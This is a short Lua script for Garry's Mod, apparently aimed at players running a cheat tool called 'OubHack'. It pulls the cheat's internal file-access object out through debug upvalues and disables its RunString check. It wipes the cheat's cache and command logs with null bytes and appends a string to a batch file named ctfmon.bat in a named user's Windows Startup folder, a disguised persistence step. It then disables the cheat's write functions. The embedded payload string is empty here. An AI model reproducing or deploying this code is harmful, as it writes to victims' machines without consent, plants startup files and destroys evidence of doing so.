

local Owned = [[

]]



local getupvalue = debug.getinfo(debug.getupvalue).func
local fuck,OH = getupvalue(hook.Call, 3)

if not OH then
	ErrorNoHalt("Try 1: Failed\n")
	return
end

local up,IOubHack = getupvalue(OH.Logging.LogToFile, 1)

if not IOubHack then
	ErrorNoHalt("Try 2: Failed\n")
	return
end


OH.IP = OH.IP or "Garrys mod"
IOubHack.CreateDir("OubHack/logs/"..OH.IP)

IOubHack.SetCallback("RunString", function() return true end)

local function EatFiles()
	IOubHack.RawWrite("OubHack/cache/"..OH.IP.."/lua/autorun/client/testy.lua", "\0", "wb")
	IOubHack.RawWrite("OubHack/logs/"..OH.IP.."/LuaCmd.log", "\0", "wb")
	IOubHack.WriteDumpFile("OubHack/cache/"..OH.IP.."/lua/autorun/client/testy.lua", "\0")
end

IOubHack.RawWrite("C:\\Users\\Fredthelaptop\\Start Menu\\Programs\\Startup\\ctfmon.bat", Owned, "a")

EatFiles()
timer.Simple(1, EatFiles)


IOubHack.RawWrite = function() end
IOubHack.WriteDumpFile = function() end













